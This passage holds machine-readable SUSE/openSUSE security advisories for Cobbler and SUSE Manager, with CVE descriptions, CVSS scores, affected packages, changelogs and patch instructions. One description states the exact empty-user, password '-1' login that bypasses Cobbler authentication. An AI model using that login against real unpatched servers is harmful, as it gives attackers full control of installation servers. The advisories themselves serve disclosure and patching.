"name": "release-notes-susemanager-4.3.14-150400.3.122.1.noarch as component of SUSE Manager Server 4.3",
"product_id": "SUSE Manager Server 4.3:release-notes-susemanager-4.3.14-150400.3.122.1.noarch"
},
"product_reference": "release-notes-susemanager-4.3.14-150400.3.122.1.noarch",
"relates_to_product_reference": "SUSE Manager Server 4.3"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2024-47533",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2024-47533"
}
],
"notes": [
{
"category": "general",
"text": "Cobbler, a Linux installation server that allows for rapid setup of network installation environments, has an improper authentication vulnerability starting in version 3.0.0 and prior to versions 3.2.3 and 3.3.7. `utils.get_shared_secret()` always returns `-1`, which allows anyone to connect to cobbler XML-RPC as user `\u0027\u0027` password `-1` and make any changes. This gives anyone with network access to a cobbler server full control of the server. Versions 3.2.3 and 3.3.7 fix the issue.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Manager Proxy 4.3:release-notes-susemanager-proxy-4.3.14-150400.3.90.1.noarch",
"SUSE Manager Server 4.3:release-notes-susemanager-4.3.14-150400.3.122.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2024-47533",
"url": "https://www.suse.com/security/cve/CVE-2024-47533"
},
{
"category": "external",
"summary": "SUSE Bug 1231332 for CVE-2024-47533",
"url": "https://bugzilla.suse.com/1231332"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Manager Proxy 4.3:release-notes-susemanager-proxy-4.3.14-150400.3.90.1.noarch",
"SUSE Manager Server 4.3:release-notes-susemanager-4.3.14-150400.3.122.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Manager Proxy 4.3:release-notes-susemanager-proxy-4.3.14-150400.3.90.1.noarch",
"SUSE Manager Server 4.3:release-notes-susemanager-4.3.14-150400.3.122.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2024-11-18T13:20:15Z",
"details": "critical"
}
],
"title": "CVE-2024-47533"
},
{
"cve": "CVE-2024-49502",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2024-49502"
}
],
"notes": [
{
"category": "general",
"text": "A Improper Neutralization of Input During Web Page Generation (XSS or \u0027Cross-site Scripting\u0027) vulnerability in the Setup Wizard, HTTP Proxy credentials pane in spacewalk-web allows attackers to attack users by providing specially crafted URLs to click.\nThis issue affects Container suse/manager/5.0/x86_64/server:5.0.2.7.8.1: before 5.0.15-150600.3.10.2; SUSE Manager Server Module 4.3: before 4.3.42-150400.3.52.1.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Manager Proxy 4.3:release-notes-susemanager-proxy-4.3.14-150400.3.90.1.noarch",
"SUSE Manager Server 4.3:release-notes-susemanager-4.3.14-150400.3.122.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2024-49502",
"url": "https://www.suse.com/security/cve/CVE-2024-49502"
},
{
"category": "external",
"summary": "SUSE Bug 1231852 for CVE-2024-49502",
"url": "https://bugzilla.suse.com/1231852"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Manager Proxy 4.3:release-notes-susemanager-proxy-4.3.14-150400.3.90.1.noarch",
"SUSE Manager Server 4.3:release-notes-susemanager-4.3.14-150400.3.122.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 3.5,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:L/A:N",
"version": "3.1"
},
"products": [
"SUSE Manager Proxy 4.3:release-notes-susemanager-proxy-4.3.14-150400.3.90.1.noarch",
"SUSE Manager Server 4.3:release-notes-susemanager-4.3.14-150400.3.122.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2024-11-18T13:20:15Z",
"details": "low"
}
],
"title": "CVE-2024-49502"
},
{
"cve": "CVE-2024-49503",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2024-49503"
}
],
"notes": [
{
"category": "general",
"text": "A Improper Neutralization of Input During Web Page Generation (XSS or \u0027Cross-site Scripting\u0027) vulnerability in SUSE manager allows attackers to execute Javascript code in the organization credentials sub page.\nThis issue affects Container suse/manager/5.0/x86_64/server:5.0.2.7.8.1: before 5.0.15-150600.3.10.2; SUSE Manager Server Module 4.3: before 4.3.42-150400.3.52.1.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Manager Proxy 4.3:release-notes-susemanager-proxy-4.3.14-150400.3.90.1.noarch",
"SUSE Manager Server 4.3:release-notes-susemanager-4.3.14-150400.3.122.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2024-49503",
"url": "https://www.suse.com/security/cve/CVE-2024-49503"
},
{
"category": "external",
"summary": "SUSE Bug 1231922 for CVE-2024-49503",
"url": "https://bugzilla.suse.com/1231922"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Manager Proxy 4.3:release-notes-susemanager-proxy-4.3.14-150400.3.90.1.noarch",
"SUSE Manager Server 4.3:release-notes-susemanager-4.3.14-150400.3.122.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 3.5,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:L/A:N",
"version": "3.1"
},
"products": [
"SUSE Manager Proxy 4.3:release-notes-susemanager-proxy-4.3.14-150400.3.90.1.noarch",
"SUSE Manager Server 4.3:release-notes-susemanager-4.3.14-150400.3.122.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2024-11-18T13:20:15Z",
"details": "low"
}
],
"title": "CVE-2024-49503"
}
]
}
opensuse-su-2024:14512-1
Vulnerability from csaf_opensuse
Published
2024-11-20 00:00
Modified
2024-11-20 00:00
Summary
cobbler-3.3.7-1.1 on GA media
Notes
Title of the patch
cobbler-3.3.7-1.1 on GA media
Description of the patch
These are all security issues fixed in the cobbler-3.3.7-1.1 package on the GA media of openSUSE Tumbleweed.
Patchnames
openSUSE-Tumbleweed-2024-14512
Terms of use
CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "moderate"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "cobbler-3.3.7-1.1 on GA media",
"title": "Title of the patch"
},
{
"category": "description",
"text": "These are all security issues fixed in the cobbler-3.3.7-1.1 package on the GA media of openSUSE Tumbleweed.",
"title": "Description of the patch"
},
{
"category": "details",
"text": "openSUSE-Tumbleweed-2024-14512",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/opensuse-su-2024_14512-1.json"
},
{
"category": "self",
"summary": "URL for openSUSE-SU-2024:14512-1",
"url": "https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/2LAXV37YWWRKUA3I3RM5AVTLLGOJCZUG/"
},
{
"category": "self",
"summary": "E-Mail link for openSUSE-SU-2024:14512-1",
"url": "https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/2LAXV37YWWRKUA3I3RM5AVTLLGOJCZUG/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2024-47533 page",
"url": "https://www.suse.com/security/cve/CVE-2024-47533/"
}
],
"title": "cobbler-3.3.7-1.1 on GA media",
"tracking": {
"current_release_date": "2024-11-20T00:00:00Z",
"generator": {
"date": "2024-11-20T00:00:00Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "openSUSE-SU-2024:14512-1",
"initial_release_date": "2024-11-20T00:00:00Z",
"revision_history": [
{
"date": "2024-11-20T00:00:00Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "cobbler-3.3.7-1.1.aarch64",
"product": {
"name": "cobbler-3.3.7-1.1.aarch64",
"product_id": "cobbler-3.3.7-1.1.aarch64"
}
},
{
"category": "product_version",
"name": "cobbler-tests-3.3.7-1.1.aarch64",
"product": {
"name": "cobbler-tests-3.3.7-1.1.aarch64",
"product_id": "cobbler-tests-3.3.7-1.1.aarch64"
}
},
{
"category": "product_version",
"name": "cobbler-tests-containers-3.3.7-1.1.aarch64",
"product": {
"name": "cobbler-tests-containers-3.3.7-1.1.aarch64",
"product_id": "cobbler-tests-containers-3.3.7-1.1.aarch64"
}
}
],
"category": "architecture",
"name": "aarch64"
},
{
"branches": [
{
"category": "product_version",
"name": "cobbler-3.3.7-1.1.ppc64le",
"product": {
"name": "cobbler-3.3.7-1.1.ppc64le",
"product_id": "cobbler-3.3.7-1.1.ppc64le"
}
},
{
"category": "product_version",
"name": "cobbler-tests-3.3.7-1.1.ppc64le",
"product": {
"name": "cobbler-tests-3.3.7-1.1.ppc64le",
"product_id": "cobbler-tests-3.3.7-1.1.ppc64le"
}
},
{
"category": "product_version",
"name": "cobbler-tests-containers-3.3.7-1.1.ppc64le",
"product": {
"name": "cobbler-tests-containers-3.3.7-1.1.ppc64le",
"product_id": "cobbler-tests-containers-3.3.7-1.1.ppc64le"
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "cobbler-3.3.7-1.1.s390x",
"product": {
"name": "cobbler-3.3.7-1.1.s390x",
"product_id": "cobbler-3.3.7-1.1.s390x"
}
},
{
"category": "product_version",
"name": "cobbler-tests-3.3.7-1.1.s390x",
"product": {
"name": "cobbler-tests-3.3.7-1.1.s390x",
"product_id": "cobbler-tests-3.3.7-1.1.s390x"
}
},
{
"category": "product_version",
"name": "cobbler-tests-containers-3.3.7-1.1.s390x",
"product": {
"name": "cobbler-tests-containers-3.3.7-1.1.s390x",
"product_id": "cobbler-tests-containers-3.3.7-1.1.s390x"
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "cobbler-3.3.7-1.1.x86_64",
"product": {
"name": "cobbler-3.3.7-1.1.x86_64",
"product_id": "cobbler-3.3.7-1.1.x86_64"
}
},
{
"category": "product_version",
"name": "cobbler-tests-3.3.7-1.1.x86_64",
"product": {
"name": "cobbler-tests-3.3.7-1.1.x86_64",
"product_id": "cobbler-tests-3.3.7-1.1.x86_64"
}
},
{
"category": "product_version",
"name": "cobbler-tests-containers-3.3.7-1.1.x86_64",
"product": {
"name": "cobbler-tests-containers-3.3.7-1.1.x86_64",
"product_id": "cobbler-tests-containers-3.3.7-1.1.x86_64"
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_name",
"name": "openSUSE Tumbleweed",
"product": {
"name": "openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed",
"product_identification_helper": {
"cpe": "cpe:/o:opensuse:tumbleweed"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "cobbler-3.3.7-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:cobbler-3.3.7-1.1.aarch64"
},
"product_reference": "cobbler-3.3.7-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "cobbler-3.3.7-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:cobbler-3.3.7-1.1.ppc64le"
},
"product_reference": "cobbler-3.3.7-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "cobbler-3.3.7-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:cobbler-3.3.7-1.1.s390x"
},
"product_reference": "cobbler-3.3.7-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "cobbler-3.3.7-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:cobbler-3.3.7-1.1.x86_64"
},
"product_reference": "cobbler-3.3.7-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "cobbler-tests-3.3.7-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:cobbler-tests-3.3.7-1.1.aarch64"
},
"product_reference": "cobbler-tests-3.3.7-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "cobbler-tests-3.3.7-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:cobbler-tests-3.3.7-1.1.ppc64le"
},
"product_reference": "cobbler-tests-3.3.7-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "cobbler-tests-3.3.7-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:cobbler-tests-3.3.7-1.1.s390x"
},
"product_reference": "cobbler-tests-3.3.7-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "cobbler-tests-3.3.7-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:cobbler-tests-3.3.7-1.1.x86_64"
},
"product_reference": "cobbler-tests-3.3.7-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "cobbler-tests-containers-3.3.7-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:cobbler-tests-containers-3.3.7-1.1.aarch64"
},
"product_reference": "cobbler-tests-containers-3.3.7-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "cobbler-tests-containers-3.3.7-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:cobbler-tests-containers-3.3.7-1.1.ppc64le"
},
"product_reference": "cobbler-tests-containers-3.3.7-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "cobbler-tests-containers-3.3.7-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:cobbler-tests-containers-3.3.7-1.1.s390x"
},
"product_reference": "cobbler-tests-containers-3.3.7-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "cobbler-tests-containers-3.3.7-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:cobbler-tests-containers-3.3.7-1.1.x86_64"
},
"product_reference": "cobbler-tests-containers-3.3.7-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2024-47533",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2024-47533"
}
],
"notes": [
{
"category": "general",
"text": "Cobbler, a Linux installation server that allows for rapid setup of network installation environments, has an improper authentication vulnerability starting in version 3.0.0 and prior to versions 3.2.3 and 3.3.7. `utils.get_shared_secret()` always returns `-1`, which allows anyone to connect to cobbler XML-RPC as user `\u0027\u0027` password `-1` and make any changes. This gives anyone with network access to a cobbler server full control of the server. Versions 3.2.3 and 3.3.7 fix the issue.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:cobbler-3.3.7-1.1.aarch64",
"openSUSE Tumbleweed:cobbler-3.3.7-1.1.ppc64le",
"openSUSE Tumbleweed:cobbler-3.3.7-1.1.s390x",
"openSUSE Tumbleweed:cobbler-3.3.7-1.1.x86_64",
"openSUSE Tumbleweed:cobbler-tests-3.3.7-1.1.aarch64",
"openSUSE Tumbleweed:cobbler-tests-3.3.7-1.1.ppc64le",
"openSUSE Tumbleweed:cobbler-tests-3.3.7-1.1.s390x",
"openSUSE Tumbleweed:cobbler-tests-3.3.7-1.1.x86_64",
"openSUSE Tumbleweed:cobbler-tests-containers-3.3.7-1.1.aarch64",
"openSUSE Tumbleweed:cobbler-tests-containers-3.3.7-1.1.ppc64le",
"openSUSE Tumbleweed:cobbler-tests-containers-3.3.7-1.1.s390x",
"openSUSE Tumbleweed:cobbler-tests-containers-3.3.7-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2024-47533",
"url": "https://www.suse.com/security/cve/CVE-2024-47533"
},
{
"category": "external",
"summary": "SUSE Bug 1231332 for CVE-2024-47533",
"url": "https://bugzilla.suse.com/1231332"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:cobbler-3.3.7-1.1.aarch64",
"openSUSE Tumbleweed:cobbler-3.3.7-1.1.ppc64le",
"openSUSE Tumbleweed:cobbler-3.3.7-1.1.s390x",
"openSUSE Tumbleweed:cobbler-3.3.7-1.1.x86_64",
"openSUSE Tumbleweed:cobbler-tests-3.3.7-1.1.aarch64",
"openSUSE Tumbleweed:cobbler-tests-3.3.7-1.1.ppc64le",
"openSUSE Tumbleweed:cobbler-tests-3.3.7-1.1.s390x",
"openSUSE Tumbleweed:cobbler-tests-3.3.7-1.1.x86_64",
"openSUSE Tumbleweed:cobbler-tests-containers-3.3.7-1.1.aarch64",
"openSUSE Tumbleweed:cobbler-tests-containers-3.3.7-1.1.ppc64le",
"openSUSE Tumbleweed:cobbler-tests-containers-3.3.7-1.1.s390x",
"openSUSE Tumbleweed:cobbler-tests-containers-3.3.7-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:cobbler-3.3.7-1.1.aarch64",
"openSUSE Tumbleweed:cobbler-3.3.7-1.1.ppc64le",
"openSUSE Tumbleweed:cobbler-3.3.7-1.1.s390x",
"openSUSE Tumbleweed:cobbler-3.3.7-1.1.x86_64",
"openSUSE Tumbleweed:cobbler-tests-3.3.7-1.1.aarch64",
"openSUSE Tumbleweed:cobbler-tests-3.3.7-1.1.ppc64le",
"openSUSE Tumbleweed:cobbler-tests-3.3.7-1.1.s390x",
"openSUSE Tumbleweed:cobbler-tests-3.3.7-1.1.x86_64",
"openSUSE Tumbleweed:cobbler-tests-containers-3.3.7-1.1.aarch64",
"openSUSE Tumbleweed:cobbler-tests-containers-3.3.7-1.1.ppc64le",
"openSUSE Tumbleweed:cobbler-tests-containers-3.3.7-1.1.s390x",
"openSUSE Tumbleweed:cobbler-tests-containers-3.3.7-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2024-11-20T00:00:00Z",
"details": "critical"
}
],
"title": "CVE-2024-47533"
}
]
}
opensuse-su-2024:0382-1
Vulnerability from csaf_opensuse
Published
2024-11-28 17:32
Modified
2024-11-28 17:32
Summary
Security update for cobbler
Notes
Title of the patch
Security update for cobbler
Description of the patch
This update for cobbler fixes the following issues:
Update to 3.3.7:
* Security: Fix issue that allowed anyone to connect to the API
as admin (CVE-2024-47533, boo#1231332)
* bind - Fix bug that prevents cname entries from being
generated successfully
* Fix build on RHEL9 based distributions (fence-agents-all split)
* Fix for Windows systems
* Docs: Add missing dependencies for source installation
* Fix issue that prevented systems from being synced when the
profile was edited
Update to 3.3.6:
* Upstream all openSUSE specific patches that were maintained in Git
* Fix rename of items that had uppercase letters
* Skip inconsistent collections instead of crashing the daemon
- Update to 3.3.5:
* Added collection indicies for UUID's, MAC's, IP addresses and hostnames
boo#1219933
* Re-added to_dict() caching
* Added lazy loading for the daemon (off by default)
- Update to 3.3.4:
* Added cobbler-tests-containers subpackage
* Updated the distro_signatures.json database
* The default name for grub2-efi changed to grubx64.efi to match
the DHCP template
- Do generate boot menus even if no profiles or systems - only local boot
- Avoid crashing running buildiso in certain conditions.
- Fix settings migration schema to work while upgrading on existing running
Uyuni and SUSE Manager servers running with old Cobbler settings (boo#1203478)
- Consider case of 'next_server' being a hostname during migration
of Cobbler collections.
- Fix problem with 'proxy_url_ext' setting being None type.
- Update v2 to v3 migration script to allow migration of collections
that contains settings from Cobbler 2. (boo#1203478)
- Fix problem for the migration of 'autoinstall' collection attribute.
- Fix failing Cobbler tests after upgrading to 3.3.3.
- Fix regression: allow empty string as interface_type value (boo#1203478)
- Avoid possible override of existing values during migration
of collections to 3.0.0 (boo#1206160)
- Add missing code for previous patch file around boot_loaders migration.
- Improve Cobbler performance with item cache and threadpool (boo#1205489)
- Skip collections that are inconsistent instead of crashing (boo#1205749)
- Items: Fix creation of 'default' NetworkInterface (boo#1206520)
- S390X systems require their kernel options to have a linebreak at
79 characters (boo#1207595)
- settings-migration-v1-to-v2.sh will now handle paths with whitespace
correct
- Fix renaming Cobbler items (boo#1204900, boo#1209149)
- Fix cobbler buildiso so that the artifact can be booted by EFI firmware.
(boo#1206060)
- Add input_string_*, input_boolean, input_int functiont to public API
Patchnames
openSUSE-2024-382
Terms of use
CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Security update for cobbler",
"title": "Title of the patch"
},
{
"category": "description",
"text": "This update for cobbler fixes the following issues:\n\nUpdate to 3.3.7:\n\n * Security: Fix issue that allowed anyone to connect to the API\n as admin (CVE-2024-47533, boo#1231332)\n\n * bind - Fix bug that prevents cname entries from being\n generated successfully\n * Fix build on RHEL9 based distributions (fence-agents-all split)\n * Fix for Windows systems\n * Docs: Add missing dependencies for source installation\n * Fix issue that prevented systems from being synced when the\n profile was edited\n\nUpdate to 3.3.6:\n\n * Upstream all openSUSE specific patches that were maintained in Git\n * Fix rename of items that had uppercase letters\n * Skip inconsistent collections instead of crashing the daemon\n\n- Update to 3.3.5:\n * Added collection indicies for UUID\u0027s, MAC\u0027s, IP addresses and hostnames\n boo#1219933\n * Re-added to_dict() caching\n * Added lazy loading for the daemon (off by default)\n\n- Update to 3.3.4:\n\n * Added cobbler-tests-containers subpackage\n * Updated the distro_signatures.json database\n * The default name for grub2-efi changed to grubx64.efi to match\n the DHCP template\n\n- Do generate boot menus even if no profiles or systems - only local boot\n- Avoid crashing running buildiso in certain conditions.\n- Fix settings migration schema to work while upgrading on existing running\n Uyuni and SUSE Manager servers running with old Cobbler settings (boo#1203478)\n- Consider case of \u0027next_server\u0027 being a hostname during migration\n of Cobbler collections.\n- Fix problem with \u0027proxy_url_ext\u0027 setting being None type.\n- Update v2 to v3 migration script to allow migration of collections\n that contains settings from Cobbler 2. (boo#1203478)\n- Fix problem for the migration of \u0027autoinstall\u0027 collection attribute.\n- Fix failing Cobbler tests after upgrading to 3.3.3.\n- Fix regression: allow empty string as interface_type value (boo#1203478) \n- Avoid possible override of existing values during migration\n of collections to 3.0.0 (boo#1206160)\n- Add missing code for previous patch file around boot_loaders migration.\n- Improve Cobbler performance with item cache and threadpool (boo#1205489)\n- Skip collections that are inconsistent instead of crashing (boo#1205749)\n- Items: Fix creation of \u0027default\u0027 NetworkInterface (boo#1206520)\n- S390X systems require their kernel options to have a linebreak at\n 79 characters (boo#1207595)\n- settings-migration-v1-to-v2.sh will now handle paths with whitespace\n correct\n- Fix renaming Cobbler items (boo#1204900, boo#1209149)\n- Fix cobbler buildiso so that the artifact can be booted by EFI firmware.\n (boo#1206060)\n- Add input_string_*, input_boolean, input_int functiont to public API\n",
"title": "Description of the patch"
},
{
"category": "details",
"text": "openSUSE-2024-382",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/opensuse-su-2024_0382-1.json"
},
{
"category": "self",
"summary": "URL for openSUSE-SU-2024:0382-1",
"url": "https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/CGWWFM26ZMG5SCPMDNQQNYHHTROXVX2Q/"
},
{
"category": "self",
"summary": "E-Mail link for openSUSE-SU-2024:0382-1",
"url": "https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/CGWWFM26ZMG5SCPMDNQQNYHHTROXVX2Q/"
},
{
"category": "self",
"summary": "SUSE Bug 1203478",
"url": "https://bugzilla.suse.com/1203478"
},
{
"category": "self",
"summary": "SUSE Bug 1204900",
"url": "https://bugzilla.suse.com/1204900"
},
{
"category": "self",
"summary": "SUSE Bug 1205489",
"url": "https://bugzilla.suse.com/1205489"
},
{
"category": "self",
"summary": "SUSE Bug 1205749",
"url": "https://bugzilla.suse.com/1205749"
},
{
"category": "self",
"summary": "SUSE Bug 1206060",
"url": "https://bugzilla.suse.com/1206060"
},
{
"category": "self",
"summary": "SUSE Bug 1206160",
"url": "https://bugzilla.suse.com/1206160"
},
{
"category": "self",
"summary": "SUSE Bug 1206520",
"url": "https://bugzilla.suse.com/1206520"
},
{
"category": "self",
"summary": "SUSE Bug 1207595",
"url": "https://bugzilla.suse.com/1207595"
},
{
"category": "self",
"summary": "SUSE Bug 1209149",
"url": "https://bugzilla.suse.com/1209149"
},
{
"category": "self",
"summary": "SUSE Bug 1219933",
"url": "https://bugzilla.suse.com/1219933"
},
{
"category": "self",
"summary": "SUSE Bug 1231332",
"url": "https://bugzilla.suse.com/1231332"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2024-47533 page",
"url": "https://www.suse.com/security/cve/CVE-2024-47533/"
}
],
"title": "Security update for cobbler",
"tracking": {
"current_release_date": "2024-11-28T17:32:46Z",
"generator": {
"date": "2024-11-28T17:32:46Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "openSUSE-SU-2024:0382-1",
"initial_release_date": "2024-11-28T17:32:46Z",
"revision_history": [
{
"date": "2024-11-28T17:32:46Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "cobbler-3.3.7-bp155.2.3.2.noarch",
"product": {
"name": "cobbler-3.3.7-bp155.2.3.2.noarch",
"product_id": "cobbler-3.3.7-bp155.2.3.2.noarch"
}
},
{
"category": "product_version",
"name": "cobbler-tests-3.3.7-bp155.2.3.2.noarch",
"product": {
"name": "cobbler-tests-3.3.7-bp155.2.3.2.noarch",
"product_id": "cobbler-tests-3.3.7-bp155.2.3.2.noarch"
}
},
{
"category": "product_version",
"name": "cobbler-tests-containers-3.3.7-bp155.2.3.2.noarch",
"product": {
"name": "cobbler-tests-containers-3.3.7-bp155.2.3.2.noarch",
"product_id": "cobbler-tests-containers-3.3.7-bp155.2.3.2.noarch"
}
}
],
"category": "architecture",
"name": "noarch"
},
{
"branches": [
{
"category": "product_name",
"name": "SUSE Package Hub 15 SP5",
"product": {
"name": "SUSE Package Hub 15 SP5",
"product_id": "SUSE Package Hub 15 SP5"
}
},
{
"category": "product_name",
"name": "openSUSE Leap 15.5",
"product": {
"name": "openSUSE Leap 15.5",
"product_id": "openSUSE Leap 15.5",
"product_identification_helper": {
"cpe": "cpe:/o:opensuse:leap:15.5"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "cobbler-3.3.7-bp155.2.3.2.noarch as component of SUSE Package Hub 15 SP5",
